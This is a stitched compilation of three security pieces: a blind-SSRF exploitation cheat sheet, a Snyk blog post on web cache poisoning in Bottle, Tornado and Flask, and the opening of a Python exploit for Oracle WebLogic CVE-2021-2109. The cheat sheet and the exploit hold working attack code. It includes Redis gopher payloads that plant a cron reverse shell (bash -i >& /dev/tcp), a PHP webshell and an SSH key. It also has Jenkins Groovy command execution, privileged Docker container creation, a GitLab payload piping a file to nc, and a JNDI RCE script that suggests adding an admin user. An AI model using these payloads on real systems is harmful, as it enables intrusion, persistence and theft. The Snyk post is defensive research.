/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='orange.tw', root='http://SSRF_CANARY/')%0a@Grab(group='tw.orange', module='poc', version='1')%0aimport Orange;

RCE via Groovy

cmd = 'curl burp_collab'
pay = 'public class x {public x(){"%s".execute()}}' % cmd
data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + urllib.quote(pay)

Hystrix Dashboard

Commonly bound ports: 80,443 (SSL),8080

Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6.

SSRF Canary: CVE-2020-5412

/proxy.stream?origin=http://SSRF_CANARY/

W3 Total Cache

Commonly bound ports: 80,443 (SSL)

W3 Total Cache

SSRF Canary: CVE-2019-6715

This needs to be a PUT request:

PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Connection: close

{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://SSRF_CANARY"}

SSRF Canary

The advisory for this vulnerability was released here: W3 Total Cache SSRF vulnerability

This PHP code will generate a payload for your SSRF Canary host (replace url with your canary host):

<?php
$url='http://www.google.com';
$file=strtr(base64_encode(gzdeflate($url.'#https://ajax.googleapis.com')), '+/=', '-_');
$file=chop($file,'=');
$req='/wp-content/plugins/w3-total-cache/pub/minify.php?file='.$file.'.css';
echo($req);
?>

Docker

Commonly bound ports: 2375, 2376 (SSL)

If you have a partially blind SSRF, you can use the following paths to verify the presence of Docker's API:

/containers/json
/secrets
/services

RCE via running an arbitrary docker image

POST /containers/create?name=test HTTP/1.1
Host: website.com
Content-Type:
application/json
...

{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}

Replace alpine with an arbitrary image you would like the docker container to run.

Gitlab Prometheus Redis Exporter

Commonly bound ports: 9121

This vulnerability affects Gitlab instances before version 13.1.1. According to the Gitlab documentation, Prometheus and its exporters are on by default, starting with GitLab 9.0. These exporters provide an excellent method for an attacker to pivot and attack other services using CVE-2020-13379. One of the exporters which is easily exploited is the Redis Exporter. The following endpoint will allow an attacker to dump all the keys in the redis server provided via the target parameter:

http://localhost:9121/scrape?target=redis://*

Possible via Gopher

Redis

Commonly bound port: 6379

Recommended reading:
Trying to hack Redis via HTTP requests
SSRF Exploits against Redis

RCE via Cron - Gopher Attack Surfaces

redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/ 0>&1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save

Gopher:

gopher://*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/ 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

RCE via Shell Upload (PHP) - Redis Getshell Summary

#!/usr/bin/env python
# -*-coding:utf-8-*-
import urllib
protocol="gopher://"
ip=""
port="6379"
shell="\n\n<?php phpinfo();?>\n\n"
filename="shell.php"
path="/var"
passwd=""
cmd=["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save"
     ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))

payload=protocol+ip+":"+port+"/_"

def redis_format(arr):
    CRLF="\r\n"
    redis_arr = arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
    cmd+=CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.quote(redis_format(x))
    print payload

RCE via authorized_keys - Redis Getshell Summary

import urllib
protocol="gopher://"
ip=""
port="6379"
# shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
sshpublic_key = "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8IOnJUAt5b/5jDwBDYJTDULjzaqBe2KW3KhqlaY58XveKQRBLrG3ZV0ffPnIW5SLdueunb4HoFKDQ/KPXFzyvVjqByj5688THkq1RJkYxGlgFNgMoPN151zpZ+eCBdFZEf/m8yIb3/7Cp+31s6Q/DvIFif6IjmVRfWXhnkjNehYjsp4gIEBiiW/jWId5yrO9+AwAX4xSabbxuUyu02AQz8wp+h8DZS9itA9m7FyJw8gCrKLEnM7PK/ClEBevDPSR+0YvvYtnUxeCosqp9VrjTfo5q0nNg9JAvPMs+EA1ohUct9UyXbTehr1Bdv4IXx9+7Vhf4/qwle8HKali3feIZ root@kali\n\n"
filename="authorized_keys"
path="/root/.ssh/"
passwd=""
cmd=["flushall",
     "set 1 {}".format(sshpublic_key.replace(" ","${IFS}")),
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save"
     ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))

payload=protocol+ip+":"+port+"/_"

def redis_format(arr):
    CRLF="\r\n"
    redis_arr = arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
    cmd+=CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.quote(redis_format(x))
    print payload

RCE on GitLab via Git protocol

Great writeup from Liveoverflow here. While this required authenticated access to GitLab to exploit, I am including the payload here as the git protocol may work on the target you are hacking. This payload is for reference.
git://[0:0:0:0:0:ffff:]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git

Memcache

Commonly bound port: 11211

vBulletin Memcache RCE
GitHub Enterprise Memcache RCE

Example Gopher payload for Memcache:

gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a
gopher:// ssrftest%0d%0a

Apache Tomcat

Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)

Effective against Tomcat 6 only: gopher-tomcat-deployer

CTF writeup using this technique: From XXE to RCE: Pwn2Win CTF 2018 Writeup

FastCGI

Commonly bound ports: 80,443 (SSL)

This was taken from here.

gopher://

Tools

Gopherus

Gopherus - Github
Blog post on Gopherus

This tool generates Gopher payloads for:
MySQL
PostgreSQL
FastCGI
Redis
Zabbix
Memcache

SSRF Proxy

SSRF Proxy

SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).

Credits:

Thank you to the following people that have contributed to this post:
@Rhynorater - Numerous contributions towards this blog post
@nnwakelam - Solr Shards SSRF
@marcioalm - Tomcat 6 Gopher RCE
@vtnahira - OpenTSDB RCE
@fransrosen - SSRF canaries concept
@theabrahack - RCE via Jenkins Groovy

Sursa: https://github.com/assetnote/blind-ssrf-chains
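Many of the gopher:// payloads above (Redis, Memcache) follow the same recipe: join the raw protocol lines with CRLF and percent-encode the result after the "_" gopher item-type character. A minimal sketch of that encoding step (the host and the Redis commands below are illustrative placeholders, not from the post):

```python
from urllib.parse import quote

def gopher_payload(host, port, commands):
    # Gopher URLs tunnel raw TCP: everything after the "_" item type is
    # decoded by the client and written to the socket verbatim, so each
    # protocol line must end with CRLF before percent-encoding.
    raw = "".join(c + "\r\n" for c in commands)
    return "gopher://{}:{}/_{}".format(host, port, quote(raw))

# Illustrative only: a harmless Redis PING against a placeholder host
print(gopher_payload("192.0.2.10", 6379, ["PING", "quit"]))
```

The same helper reproduces the shape of the cron and authorized_keys payloads once you feed it the corresponding RESP-formatted command strings.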
    • Cache poisoning in popular open source packages

Adam Goldschmidt, January 18, 2021

Following research done by James Kettle from PortSwigger on web cache poisoning, Snyk's Security Team decided to deepen our knowledge in this field and to explore these vulnerabilities in the open source domain. We focused our research on the most popular web frameworks in both npm and PyPI, such as Flask (Werkzeug), Bottle, Tornado, and DerbyJS. This blog post provides an introduction to web cache poisoning and demonstrates why open source maintainers should take this issue into account. Furthermore, it provides examples of vulnerabilities in well-known open source frameworks that were found during Snyk's initial research.

Cache poisoning explained

Web cache poisoning is an attack designed to trick the cache into serving malicious responses to valid requests. It is made possible by including unkeyed parameters in the request, which are saved in the cache but unrepresented in the cache key (hence: unkeyed). To fully understand how the attack works, the concept of web caching should be understood.

What is a cache proxy?

A cache proxy is part of a reverse proxy, an intermediate connection between the client and the web server. When a user accesses a website, proxies interpret and respond to requests on behalf of the original server. Proxy caching is one of the features of a reverse proxy, allowing for faster delivery of responses to the user.

How does caching work?

Caching is storing frequently accessed content in order to speed up subsequent requests for that content. Cache keys are used in order for the cache to keep references to the responses. Typically, a cache key consists of the values of one or more request headers and a part of the URL. For example, for the following HTTP request, the cache key might be localhost/p/?a=1.
GET /p/?a=1 HTTP/1.1
Host: localhost
Origin: example
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

When receiving a new request, if the cache is able to find a matching cache key then the saved response will be served instead of generating a new response. As can be seen in the example above, there are headers which can possibly affect the response but are not reflected in the cache key. This means that if we change their values, the response will get saved in the same cache "spot", but with a different value. The following table shows how three different requests are treated with the cache key defined as $host$query_args:

Host          Accept-Encoding   Query arguments   Cache key
example.com   gzip, deflate     ?q=search         example.com?q=search
example.com   identity          ?q=search         example.com?q=search
snyk.io       gzip, deflate     (none)            snyk.io

The first two rows have the same cache key despite having different Accept-Encoding values, therefore they will be cached in the same cache spot.

Understanding unkeyed parameters

Inputs that aren't part of the cache key are called unkeyed parameters. This becomes an issue when these parameters can cause malicious behavior in the application. For example, an attacker can turn a reflected XSS into a stored XSS. Let's take this request for example:

GET / HTTP/1.1
Host: somesite.com
Origin: <script>alert(1)</script>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Assuming that the Origin parameter is reflected unsanitized, can cause an XSS, and is not keyed, every user that visits somesite.com/ will be served the malicious response until the cached response expires. To learn more about cache poisoning and the possible attack vectors, I recommend reading the following posts by James Kettle: Practical Web Cache Poisoning and Web Cache Entanglement: Novel Pathways to Poisoning.

Exploring vulnerabilities within web frameworks

A web framework allows the developer to effortlessly generate HTTP responses.
From Wikipedia: "Web frameworks provide a standard way to build and deploy web applications on the World Wide Web. Web frameworks aim to automate the overhead associated with common activities performed in web development." Usually, these frameworks also contain some security measures in order to make developers' lives even easier. Developers often use web frameworks in conjunction with a cache proxy, such as NGINX or Varnish. This research shows that many of today's popular frameworks are vulnerable to web cache poisoning out of the box, almost regardless of the cache proxy being used, unless they are explicitly configured to defend against these sorts of attacks, which most developers are either unaware of or lack the knowledge to do. The following attack vectors were performed on several web frameworks using NGINX and Varnish.

GET parameter cloaking in Python and Bottle

When an attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, because the proxy usually does not treat the semicolon as a separator and therefore sees the payload as part of the value of an unkeyed parameter, such as the utm_* parameters, which are usually unkeyed. The W3C recommendation is to use ampersands as the separators ("Let strings be the result of strictly splitting the string payload on U+0026 AMPERSAND characters (&)"). The most notable finding here was in Python's source code, which contains a method called parse_qsl that splits URL query parameters on a semicolon as well as an ampersand. This method is then used by frameworks, such as Tornado, to parse query parameters, which might lead to a web cache poisoning exploitation chain. Bottle (CVE-2020-28473), Tornado (CVE-2020-28476), and Rack were found to be vulnerable.
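The parsing discrepancy can be sketched in a few lines of Python. The server_view function below hand-models the pre-fix parse_qsl behaviour (splitting on both separators, last duplicate winning); the function names and the query string are illustrative, not taken from the research:

```python
def server_view(qs):
    # Models a backend whose parser (like the vulnerable parse_qsl)
    # splits on ';' as well as '&'; dict() keeps the LAST value per key.
    pairs = []
    for part in qs.replace(";", "&").split("&"):
        if "=" in part:
            pairs.append(tuple(part.split("=", 1)))
    return dict(pairs)

def proxy_view(qs):
    # Models a cache proxy that only treats '&' as a separator.
    return dict(p.split("=", 1) for p in qs.split("&") if "=" in p)

qs = "q=cat&utm_content=1;q=dog!"
print(server_view(qs)["q"])            # the backend answers for "dog!"
print(proxy_view(qs)["q"])             # ...but the proxy still keys on q=cat
print(proxy_view(qs)["utm_content"])   # the payload hides in an unkeyed parameter
```

The malicious q=dog! never reaches the cache key, so the poisoned response is stored under the innocent-looking key.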
Let's take a look at an example for this vector, exploiting Bottle. An attacker uses q=cat as the search-box parameter and overrides it with a different value. Here are the request and the response:

GET /search/?q=cat&utm_content=1;q=dog! HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Wed, 06 Jan 2021 19:45:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 26
Connection: close
Cache-Control: max-age=10
X-Cache-Date: Wed, 06 Jan 2021 19:45:18 GMT
X-Cache: HIT

Your search query: dog!

Now let's assume a real user searches for "cat" while the malicious response is still cached:

GET /search/?q=cat HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Wed, 06 Jan 2021 19:45:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 26
Connection: close
Cache-Control: max-age=10
X-Cache-Date: Wed, 06 Jan 2021 19:45:18 GMT
X-Cache: HIT

Your search query: dog!

The attacker was able to change a legitimate request, replacing the search parameter.
The reasoning behind this is that the server sees 3 parameters here: q, utm_content, and then q again. It overrides the value of the first q parameter with the last one. The proxy, on the other hand, treats 1;q=dog! as the value of utm_content, which is why the cache key only contains localhost?q=cat.

The remediation for this vulnerability is to only use an ampersand (&) as the query parameter separator unless the developer specifies otherwise. Werkzeug, for example, allows developers to specify custom separators and uses the ampersand as the default. Bottle's maintainers decided to fix this by no longer splitting query strings on ;, introduced in version 0.12.19. The Rails framework was also found to be vulnerable to this method (discovered by James Kettle, disclosed to us with the help of Jonathan Leitschuh), but this is not yet fixed at the time of writing.

GET body parameters (fat GET) vulnerabilities in Flask and Tornado

In some proxies, NGINX for example, it is possible to include body parameters in a GET request. While this is not strictly forbidden by the HTTP RFC ("A payload within a GET request message has no defined semantics; sending a payload body on a GET request might cause some existing implementations to reject the request"), several frameworks were found to include these parameters in built-in methods which are not explicitly meant for body parameters. This might lead to developers trying to fetch GET query parameters but instead retrieving body parameters. These parameters are not keyed in the cache, which could lead to two problems:

Override of parameters

An attacker can override GET query parameters with GET body parameters and deliver the cached response to other users. This issue was found in Tornado when used with NGINX. Since Tornado gives precedence to the body parameters, it was possible to override innocent users' requests with malicious ones.
Following our example from before, searching for a cat:

GET /search/?q=cat HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 6

q=dog!

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Wed, 06 Jan 2021 19:51:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 26
Connection: close
Cache-Control: max-age=10
X-Cache-Date: Wed, 06 Jan 2021 19:51:53 GMT
X-Cache: HIT

Your search query: dog!

Now when a user searches for "cat", this would be the flow:

GET /search/?q=cat HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Wed, 06 Jan 2021 19:53:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 26
Connection: close
Cache-Control: max-age=10
X-Cache-Date: Wed, 06 Jan 2021 19:51:55 GMT
X-Cache: HIT

Your search query: dog!

Given a case scenario where a reflected cross-site scripting (XSS) vulnerability exists, this could be turned into a stored XSS using this technique, which can be delivered to other application users.
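The precedence problem can be modeled without a running server. This sketch (an assumed model, using the standard parse_qs, not Tornado's actual code) merges query and body parameters the way a body-first framework would, while the proxy's cache key is derived from the query string alone:

```python
from urllib.parse import parse_qs

def framework_params(query, body):
    # Body-first merge: any body parameter silently overrides the
    # query parameter of the same name (modeled behaviour).
    params = {k: v[-1] for k, v in parse_qs(query).items()}
    params.update({k: v[-1] for k, v in parse_qs(body).items()})
    return params

def proxy_cache_key(host, query):
    # The proxy never looks at the GET body when building the key.
    return "{}?{}".format(host, query)

print(proxy_cache_key("localhost", "q=cat"))      # key under which the entry is stored
print(framework_params("q=cat", "q=dog!")["q"])   # response is generated for "dog!"
```

The response for dog! ends up cached under the key for q=cat, which is exactly the poisoning shown in the HTTP exchange above.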
Injection of extra parameters

An attacker can inject additional parameters and deliver the cached response to other users. This is not as severe as the first option, but can nonetheless be critical when chained with the right gadgets (one such example would be altering the request method by using _method in some implementations). This was proven to be possible in Flask.

GET /report HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 32

{"reason":"this is an extra field"}

This request would cause all subsequent requests of innocent users to contain the extra parameter. Snyk found that multiple frameworks allowed this behavior. However, multiple maintainers contacted by us did not see this as a direct vulnerability in the context of their package. For this reason, Snyk has decided not to issue advisories for these issues. However, it is possible to provide remediation within the packages themselves by disallowing developers from fetching body data through these ambiguous methods, as many developers use request.params as a convenience without being aware of the implications. Another solution is to not give precedence to the body parameters in these ambiguous methods, as doing so allows overriding of legitimate query parameters. For example, Werkzeug's maintainers decided to fix this by preventing request.values from using request.form in GET requests, and Tornado's maintainers went with a different approach of adding a flag to make the parsing of GET request bodies opt-in (not yet released).
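On the proxy side, one defense-in-depth sketch for the issues above (assuming NGINX's proxy_cache module; the directive names are real, the values are illustrative and must match whatever your backend actually reflects):

```nginx
# Fold any header the backend reflects into the cache key so it can
# no longer act as an unkeyed input (here: the Origin header).
proxy_cache_key "$scheme$host$request_uri$http_origin";

# Only cache GET/HEAD responses; note this does not stop NGINX from
# forwarding a GET body upstream, so framework-side fixes still matter.
proxy_cache_methods GET HEAD;
```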
Scope of remediation

During this research, we identified numerous cases where the complexity of the multiple attack vectors led to maintainers not always understanding whether remediation falls within the scope of their maintained library or should be handled at the proxy level. There are a lot of different scenarios in which cache poisoning might take place, and it is not the web framework's responsibility to mitigate them all. With that being said, the web framework could help protect against some of them by implementing additional defense-in-depth measures. It can be argued that proxies should not ignore GET body parameters, as many implementations still use them; they can, however, key these parameters in the cache as if they were query parameters. Moreover, frameworks can prevent developers from using ambiguous methods while still allowing the use of body parameters. The same goes for parameter cloaking: proxies should not use semicolons as separators because the RFC recommends against it, but frameworks should only allow it if the developer explicitly defines it.

Minimizing the risk of cache poisoning as developers

Individual developers can decrease the threat of being vulnerable by adhering to these points:

- Be aware of the cache key: If your server splits query arguments using a semicolon, make sure your cache proxy does the same. Furthermore, make sure your cache key contains the necessary headers to prevent attackers from using unkeyed parameters to achieve web cache poisoning.
- Ignore GET body parameters unless they are needed for the flow of the program, and if so, make sure to only use them when needed.
- Detect and fix other vulnerabilities within your application: Web cache poisoning is usually used in a chain of exploitation, where an attacker can deliver a malicious response to other users, for example turning a reflected XSS into a stored one.
Developers should do their best to secure their applications against these common vulnerabilities even if they seem less severe.

Summary

To conclude, this research shows that open source frameworks are vulnerable to web cache poisoning attacks almost regardless of the proxy being used (excluding some cases). While it is possible to mitigate these attacks at the proxy level, many developers are not aware of these attack vectors and are not implementing the required safeguards at the cache/proxy level. The purpose of this blog post was to raise awareness amongst the developer community. While only showing two possible vectors of web cache poisoning, there are many more out there in the wild. Developers should try to follow the points mentioned above and always keep these peculiar vulnerabilities in mind.

Sursa: https://snyk.io/blog/cache-poisoning-in-popular-open-source-packages/
    • # Exploit Title: Oracle WebLogic Server - RCE (Authenticated)
# Date: 2021-01-21
# Exploit Author: Photubias
# Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html
# Vendor Homepage: https://www.oracle.com
# Version: WebLogic,,,, (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1)
# Tested on: WebLogic with JDK-8u181 on Windows 10 20H2
# CVE: CVE-2021-2109

#!/usr/bin/env python3
'''
    Copyright 2021 Photubias(c)

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program. If not, see <http://www.gnu.org/licenses/>.

    File name CVE-2021-2109.py
    written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

    This is a native implementation without requirements, written in Python 3.
    Works equally well on Windows as Linux (as MacOS, probably ;-)
    Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
    from https://github.com/welk1n/JNDI-Injection-Exploit
    to be in the same folder
'''
import urllib.request, urllib.parse, http.cookiejar, ssl
import sys, os, optparse, subprocess, threading, time

## Static vars; change at will, but recommend leaving as is
sURL = ''
iTimeout = 5
oRun = None

## Ignore unsigned certs, if any because WebLogic is default HTTP
ssl._create_default_https_context = ssl._create_unverified_context

class runJar(threading.Thread):
    def __init__(self, sJarFile, sCMD, sAddress):
        self.stdout = []
        self.stderr = ''
        self.cmd = sCMD
        self.addr = sAddress
        self.jarfile = sJarFile
        self.proc = None
        threading.Thread.__init__(self)

    def run(self):
        self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True)
        for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line)
        for line in iter(self.proc.stderr.readline, ''): self.stderr += line

def findJNDI():
    sCurDir = os.getcwd()
    sFile = ''
    for file in os.listdir(sCurDir):
        if 'JNDI' in file and '.jar' in file:
            sFile = file
            print('[+] Found and using ' + sFile)
    return sFile

def findJAVA(bVerbose):
    try:
        oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
    except:
        exit('[-] Error: java not found, needed to run the JAR file\n Please make sure to have "java" in your path.')
    sResult = list(oProc.stdout)[0].decode()
    if bVerbose: print('[+] Found Java: ' + sResult)

def checkParams(options, args):
    if args: sHost = args[0]
    else: sHost = input('[?] Please enter the URL ['+sURL+'] : ')
    if sHost == '': sHost = sURL
    if sHost[-1:] == '/': sHost = sHost[:-1]
    if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost
    if options.username: sUser = options.username
    else: sUser = input('[?] Username [weblogic] : ')
    if sUser == '': sUser = 'weblogic'
    if options.password: sPass = options.password
    else: sPass = input('[?] Password [Passw0rd-] : ')
    if sPass == '': sPass = 'Passw0rd-'
    if options.command: sCMD = options.command
    else: sCMD = input('[?] Command to run [calc] : ')
    if sCMD == '': sCMD = 'calc'
    if options.listenaddr: sLHOST = options.listenaddr
    else: sLHOST = input('[?] Local IP to connect back to [] : ')
    if sLHOST == '': sLHOST = ''
    if options.verbose: bVerbose = True
    else: bVerbose = False
    return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose)

def startListener(sJarFile, sCMD, sAddress, bVerbose):
    global oRun
    oRun = runJar(sJarFile, sCMD, sAddress)
    oRun.start()
    print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint')
    oRun.join(3)
    if not oRun.stderr == '': exit('[-] Error starting Java listener:\n' + oRun.stderr)
    bThisLine=False
    if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180')
    for line in oRun.stdout:
        if bThisLine: return line.split('/')[3].replace('\n','')
        if 'JDK 1.8' in line: bThisLine = True

def endIt():
    global oRun
    print('[+] Closing threads')
    if oRun: oRun.proc.terminate()
    exit(0)

def main():
    usage = (
        'usage: %prog [options] URL \n'
        ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n'
        ' in the current working folder\n'
        'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n'
        'Only works when hacker is reachable via an IPv4 address\n'
        'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n'
        'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l\n'
        'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add'
    )
    parser = optparse.OptionParser(usage=usage)
    parser.add_option('--username', '-u', dest='username')
    parser.add_option('--password', '-p', dest='password')
    parser.add_option('--command', '-c', dest='command')
    parser.add_option('--listen', '-l', dest='listenaddr')
    parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False)
    ## Get or ask for the vars
    (options, args) = parser.parse_args()
    (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args)
    ## Verify Java and JAR file
    sJarFile = findJNDI()
    findJAVA(bVerbose)
    ## Keep track of cookies between requests
    cj = http.cookiejar.CookieJar()
    oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    print('[+] Verifying reachability')
    ## Get the cookie
    oRequest = urllib.request.Request(url = sHost + '/console/')
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    for c in cj:
        if c.name == 'ADMINCONSOLESESSION':
            if bVerbose: print('[+] Got cookie "' + c.value + '"')
    ## Logging in
    lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'}
    lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'}
    oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    sResult = oResponse.read().decode(errors='ignore').split('\r\n')
    bSuccess = True
    for line in sResult:
        if 'Authentication Denied' in line: bSuccess = False
    if bSuccess: print('[+] Succesfully logged in!\n')
